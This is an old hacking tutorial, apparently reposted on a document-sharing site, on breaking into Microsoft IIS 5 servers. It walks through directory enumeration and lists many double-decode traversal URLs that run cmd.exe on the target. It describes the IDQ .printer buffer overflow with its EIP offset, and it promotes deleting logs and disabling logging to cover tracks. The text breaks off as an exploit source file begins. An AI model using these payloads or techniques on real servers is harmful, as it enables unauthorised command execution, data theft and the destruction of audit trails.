This is not a article for a script kiddie. It's a little late but still applicable today, very applicable.This article is inteded to be a robust guide for hacking, and administering IIS 5 servers. Sowithout further adeu The Ultimate IIS Guide.
Outline:I. IntroductionII. Information GatheringA. EnumerationB. Identify the directory structureC. Is it patched or not?III. ExploitsA. Double Decode(Superflous)B. IDQ Buffer OverflowC. Source Code Disclosure Exploits1. Historical Importance2. Impact3. New Source Code Disclosure VulnerabilitiesD. WebDav ExlploitIV. Covering your TracksA. Where are the Logfiles?B. Why can't I delete them now!C. How I will delete them later.
ForewordKnow your stuff! Remember by default all actions of yours are logged on IIS 5 and the FTPserver, not sure about the smtp server but who cares, you can't use VRFY anyway!Let's say you are hacking a web server, and you know it is IIS 5. If the IIS Server is running it hasa virtual root. By default the virtual root is c:\inetpub\wwwroot\. So if you send the request
GET /frick.html HTTP/1.0
It checks c:\inetpub\wwwroot\ to see if it has a file named frick.html if it does it sends it. Now if yourequest the default document by way of
GET / HTTP/1.0
It then looks for the default document. Which if left unchanged is c:\inetpub\wwwroot\iisstart.asp.You must manually change the default document to whatever you wish using the IISConfiguration Dialog. If the pages default.asp or default.htm exist it will serve them instead. If both exist it will serve default.asp. This is the default precedence of the sample pages.The first things you should check for while gathering info about the server is if the administrator
has preserved the default directory structure and such. A virtual directory is a directory that canbe accessed by IIS without the directory actually being in the virtual root. Virtual Directories thatyou should check for first are:
/_vti_bin//scripts//msadc//iissamples//_vti_pvt//_vti_cnf//_private/
"What good does this do?" you might ask? Well, first it gives you a feel for the directory structureof the machine. And second, if they have failed to patch their machine, you might be able toexploit it using one of the technique's I describe in this paper. After checking those firstdirectories, you can check for some common directories on websites that have chosen not tokeep the default structure such as these.
/cgi-bin/ /bin/ /admin/ /config/ /asp//cfg/ /exe/ /php/ /perl/ /binary//src/ /tar/ /include/ /topics/ /pwd//private/ /conf/ /logs/ /log/ /audio//sound/ /pvt/ /images/ /public/ /home//cpp/ /db/ /data/ /news/
But don't let this list limit you. You must know as much as possible about the system. So use your imaginiation. Ok? Done using your imagination. Ready for the 31337 stuff? Lets begin. If the webpage has a default under construction page, it is most likely that the Server was installed byaccident and that the current user of the computer does not know about it. It has happened manytimes. At least 5 times with people I know. However whether or not they installed it by accident,the known vulnerabilities for the default installation are worthless if they used the windowsupdate. Which eradicates at least 10-20 exploits. Also before you start hacking away at the server you want do a port scan, if you haven't already, and see if ftp is running it might come in handy aswe will discuss later.The first exploits I will discuss are the Double Decode(sometimes called the SuperflousDecode)Directory Traversal Attacks. These are easily exploitable on a default installation of IIS5.0. Some people think that you must have a myriad of tools to hack. This is a very clean cutexample that prooves you can get root, armed with only a web browser. To exploit this you mustfirst find a directory with execute permissions. Such directories by default are: scripts, iissamples,msadc, and _vti_bin. In a possible exploit request string you could have"http://55.55.55.55/scripts" & *Exploit String*. I put *A Exploit String there because there are manyto choose from as listed below.(These exploit strings all execute the dos command dir, whichgives directory listing)
/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+
c:/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
I am going to stop listing exploit strings to preserve brevity. But the way the exploit works is thatIIS checks for "/../../" (dot-slash) attacks before decoding the request string. So it does not noticethat after it decodes the urlencoded string that it is in fact allowing a traversal to take place.Maybe an example will help. Let decode this string"/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\". We know that%35 decodes to 5 so replace all the %35s with 5 which looks like this"/scripts/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\". Then it checks to make sureit got all the url encoded stuff and it realizes it forgot to decode %5c, which is a \(also IIS changes/'s to \'s). Thus the final path that IIS is left with is"\scripts\..\..\..\..\winnt\system32\cmd.exe?\c+dir+c:\" which tells IIS to hop down four directoriesand then to look in c:\winnt\system32\cmd.exe and since the original directory was scripts andhad execute permissions it executes the shell "cmd.exe" and passes the command lineparameters behind the ? in the http request. The shell command would look like this "cmd.exe /cdir c:\".This is exploit is only limited by your imagination. You can copy files, delete them, disable loggingand even delete old logs by utilizing this technique. I have heard that you can upload files using itas well but I haven't been able to do it myself. You can make their floppy drive spin and if theyhave a disk in at the time, you can read files off of it easily with a type command! This is possiblewith a cd-rom drive too. There is probably a way to eject the cdrom but I don't know how. Moreinformation on this exploit at end of paper.The next exploit is the exploit used by the codered worm to squiggle its way through the ineternet.And unless you live in front of your old commodore 64 with no internet connection(which some of you might judging from the pictures at neworder) you will no doubt know how effective coderedwas. The exploit was dubbed the IDQ .Printer Overflow(Pronounced I Dee Que (dot) Printer). Theexploit was first discovered by www.eeye.com they released a simple proof of concept. The proof of concept writes a file to the root of any machine that describes how to remedy the vulnerability.The exploit is done by making a request such as
GET /NULL.printer HTTP/1.0HOST: [420 char Buffer]
At the 420 char mark you have succesfully overwritten EIP. Then shove in your shellcode and rootit! The following proof of concept was provided by www.eeye.com Note: I have been unable to gettheir proof of concept to work and will provide another and references to others at the end of thispaper.
Begin File iishack2000.c
of 00
Ultimate MS-IIS 5.0
Guide to protecting MS IIS 5.0
182 Reads
Info and Rating
| Category: | Uncategorized. |
| Rating: | |
| Upload Date: | 05/07/2009 |
| Copyright: | Attribution Non-commercial |
| Tags: |
Leave a Comment